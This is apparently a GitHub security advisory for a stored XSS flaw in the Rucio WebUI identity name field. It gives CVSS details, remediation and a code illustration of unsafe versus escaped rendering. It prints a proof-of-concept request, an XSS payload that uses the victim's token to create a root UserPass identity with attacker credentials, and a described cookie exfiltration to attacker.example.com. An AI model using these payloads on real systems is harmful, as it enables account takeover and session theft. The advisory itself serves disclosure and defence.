Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability in its Identity Name

Description

Summary

A stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.


Details

The identity name is stored and later rendered without output encoding.

Create Path:
Admin > Account Management > ACCOUNT NAME > Add Account Identity

Trigger Path:
Admin > Account Management > ACCOUNT NAME
(https://127.0.0.1:8443/ui/account?account=pentest)

Request

POST /proxy/accounts/pentest/identities HTTP/1.1
...
{"identity":"<script>alert(document.cookie)</script>","authtype":"SSH","email":"Test"}

Response

HTTP/1.1 201 CREATED
...
Created

Storing XSS payload in account identity name

Triggering XSS payload when viewing account


Impact

Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.

The impact is amplified by:
- Session cookies that are accessible to JavaScript (missing HttpOnly flag).
- API tokens exposed to the WebUI via JavaScript variables.

An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker-controlled site (e.g. GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

Attackers can also perform actions as the victim, such as creating a new UserPass identity with an attacker-known password, creating or deleting an RSE, or exfiltrating data.

XSS Payload to Create Root UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'[email protected]','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Remediation / Mitigation

All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.
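The following is an added illustration, not Rucio WebUI code: the identity name from the request above is rendered once with the unsafe string-concatenation pattern the advisory describes and once through an HTML escaper, alongside a server-side heuristic a defender could use to flag stored identity names that contain markup. The record shape ({identity, authtype}) and function names are assumptions for the example.

```javascript
// Added example (not Rucio WebUI code). The identity value is the payload
// quoted in the advisory's POST body; the record shape is assumed.
const STORED_IDENTITY = '<script>alert(document.cookie)</script>';

// Every character that changes meaning in HTML text or attribute context.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the server-provided identity is concatenated straight
// into markup and handed to an HTML sink (the .html() case from the advisory).
// The browser then parses the stored payload as a <script> element.
function renderIdentityRowUnsafe(rec) {
  return `<tr><td class="identity">${rec.identity}</td><td>${rec.authtype}</td></tr>`;
}

// Hardened pattern: each server-provided field is escaped before insertion,
// so the payload survives only as inert text. In a browser the equivalent is
// assigning to textContent / using .text() rather than .html().
function renderIdentityRowSafe(rec) {
  return `<tr><td class="identity">${escapeHtml(rec.identity)}</td>` +
         `<td>${escapeHtml(rec.authtype)}</td></tr>`;
}

// Defender-side check for the backend: an identity name (SSH key, X.509 DN,
// username) has no business containing a tag opener or an HTML entity.
// Useful as a validation rule on create and as a scan over existing rows.
function looksLikeMarkup(value) {
  return /<[a-z!\/]|&#|&[a-z]+;/i.test(String(value));
}
```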

Additional defense-in-depth measures include:
- Enforcing a strict Content Security Policy (CSP).
- Setting the HttpOnly flag on session cookies.
- Avoiding exposure of API tokens in JavaScript-accessible variables.

> Note that many pages were found exposing the API token in a JavaScript variable named token in an authenticated response, like var token = "root-root-webui-...:" (see /ui/list_accounts for example).


Basic information

Type: reviewed
Severity: medium
Published (advisory): 2026-02-25 19:29:37 UTC
Updated: 2026-02-27 21:50:25 UTC
GitHub reviewed: 2026-02-25 19:29:37 UTC
NVD published: 2026-02-25

EPSS Score

Score: 0.08%
Percentile: 23.66%

CVSS Scores

Base score: 6.1
Version: 3.1
Severity: medium
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:H)
They need powerful rights—admin, root, or similar—before this pays off.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag

Credits

- d-woosley (reporter)

Affected packages (3)

Vulnerable version ranges and first patched releases as published by GitHub.

- pip rucio-webui, vulnerable range < 35.8.3, first patched in 35.8.3
- pip rucio-webui, vulnerable range >= 36.0.0rc1, < 38.5.4, first patched in 38.5.4
- pip rucio-webui, vulnerable range >= 39.0.0rc1, < 39.3.1, first patched in 39.3.1
